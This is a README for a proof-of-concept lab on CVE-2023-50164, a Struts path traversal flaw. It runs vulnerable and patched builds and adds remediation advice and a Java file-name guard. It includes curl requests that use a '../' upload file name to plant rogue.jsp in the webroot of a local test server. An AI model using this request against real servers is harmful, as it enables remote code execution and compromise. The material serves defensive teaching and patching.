snyk-labs/CVE-2023-50164-POC
This is a Proof of Concept (PoC) for CVE-2023-50164, a path traversal vulnerability in struts-core that can lead to Remote Code Execution (RCE).

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of Henrik Plate found here.

Run the PoC

There are two maven profiles in this project: vuln and no-vuln. vuln is the default.

To run with the RCE vuln, execute the following:

mvn clean jetty:run -P vuln

To run without the RCE vuln, execute the following:

mvn clean jetty:run -P no-vuln

The difference between the two profiles is that vuln uses struts-core version 6.3.0.1 (which has the path traversal vulnerability) and no-vuln uses struts-core version 6.3.0.2 (which does not).

Exploit the Vuln

While running the vuln profile described above, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll be able to see the file rogue.jsp in the src/main/webapp folder and you can browse to it at: http://localhost:9999/struts-vuln-poc/rogue.jsp (you'll see a Ya been PWNED! message).

There is a code fix solution that works with the older Struts versions, but it is still highly advised to update your version of Struts.

To exercise the code fix, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll see an error message: Attempted path traversal attack

NOTE: If you use the no-vuln profile, you won't get an error message from the /upload-no-vuln endpoint, even if you use a relative path like ../src/main/webapp/rogue.jsp, because the newer version of Struts automatically strips away relative path references.
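As an added illustration of the kind of application-level check the code fix above performs, the following Java helper rejects a client-supplied upload file name that carries directory components and then re-verifies, after normalisation, that the resolved target is still inside the upload directory. This is example code written for this page, not the repository's own upload-no-vuln action; the class name, method names and the /tmp/uploads directory are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Example guard for a client-supplied upload file name (added illustration,
 * not the repository's upload-no-vuln action; names here are assumed).
 */
public final class UploadNameGuard {

    private UploadNameGuard() {
    }

    /**
     * Reject any client-supplied name that carries directory components.
     * Throws SecurityException, mirroring the "Attempted path traversal attack"
     * error the README describes, rather than silently rewriting the name.
     */
    public static String requirePlainFileName(String supplied) {
        if (supplied == null || supplied.isEmpty()) {
            throw new IllegalArgumentException("missing file name");
        }
        // Separators of either flavour, NUL bytes and dot-only names all mean the
        // client is trying to place the file somewhere other than the upload directory.
        boolean hasSeparator = supplied.indexOf('/') >= 0 || supplied.indexOf('\\') >= 0;
        boolean dotOnly = supplied.equals(".") || supplied.equals("..");
        if (hasSeparator || dotOnly || supplied.indexOf('\0') >= 0) {
            throw new SecurityException("Attempted path traversal attack");
        }
        return supplied;
    }

    /**
     * Resolve the checked name inside the upload directory and verify, after
     * normalisation, that the result has not escaped it (defence in depth).
     */
    public static Path resolveInside(Path uploadDir, String supplied) {
        Path base = uploadDir.toAbsolutePath().normalize();
        Path target = base.resolve(requirePlainFileName(supplied)).normalize();
        if (!target.startsWith(base) || target.equals(base)) {
            throw new SecurityException("Attempted path traversal attack");
        }
        return target;
    }

    public static void main(String[] args) {
        Path uploads = Paths.get("/tmp/uploads"); // assumed upload directory
        // Constructed inputs: the file name from the README's request and a harmless one.
        String[] samples = {"../src/main/webapp/rogue.jsp", "report.txt"};
        for (String name : samples) {
            try {
                System.out.println(name + " -> " + resolveInside(uploads, name));
            } catch (SecurityException e) {
                System.out.println(name + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Rejecting rather than stripping, as the code fix on this page does, has a detection benefit: every SecurityException is a concrete event the application can log and alert on, whereas the silent stripping described in the NOTE above leaves no trace of the attempt.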